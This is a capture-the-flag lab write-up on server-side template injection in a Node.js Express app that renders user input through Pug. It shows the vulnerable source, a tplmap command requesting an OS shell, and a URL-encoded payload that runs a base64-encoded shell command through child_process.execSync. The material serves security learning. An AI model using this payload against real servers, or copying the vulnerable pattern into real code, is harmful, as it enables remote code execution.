Simple Web 0x22(Lab - Pug)

Posted on | Post modified | In |

Simple Web 0x22(Lab - Pug)

tags: NTUSTWS CTF Web

Challenge: http://h4ck3r.quest:8008

Source code

:::spoiler

const express = require('express');
const pug = require('pug');

const app = express();

const template = `
h1 Hello %NAME%
form(method='GET' action='/')
  div
    label(for='nickname') Name:
    input#nickname(type='text', placeholder='Nickname' name='name')
    button(type='submit') Submit 
  a(href='/source') Source Code
`;

app.get('/', (req, res) => {
    const name = (req.query.name ?? 'Anonymous').toString();
    if (name.includes('{')) return res.send('Nice try');
    let html = pug.render(template.replace('%NAME%', name));
    res.set('Content-Type', 'text/html');
    res.send(html);
});

app.get("/source", (_, res) => {
    res.sendFile(__filename);
});

app.listen(3000, () => console.log(':3000'));

:::

Exploit - tqlmap 

$ ./tplmap.py --engine pug --os-shell -u "http://h4ck3r.quest:8008/?name=bob"
  • Using wireshark to trace the payload You must let the template by like: 
      const template = `
  h1 Hello %NAME%
  = global.process.mainModule.require('child_process').execSync(Buffer('bHM=', 'base64').toString())
  form(method='GET' action='/')
    div
      label(for='nickname') Name:
      input#nickname(type='text', placeholder='Nickname' name='name')
      button(type='submit') Submit 
    a(href='/source') Source Code
  `;

    Including a new line and an equal sign Payload: %0A%3D%20global.process.mainModule.require%28%27child_process%27%29.execSync%28Buffer%28%27bHM%3D%27%2C%2B%27base64%27%29.toString%28%29%29 which is

    1
    2
    		 
    
  = global.process.mainModule.require('child_process').execSync(Buffer('bHM=',+'base64').toString())
  • Note that bHM= is command ls in base64 format

Reference

关于SSTI注入的二三事 【SSTI模块注入】SSTI+Flask+Python(下):绕过过滤 0xdbe-appsec/ssti-express-pug Tplmap [Linux系統] Ubuntu 安裝 Node.js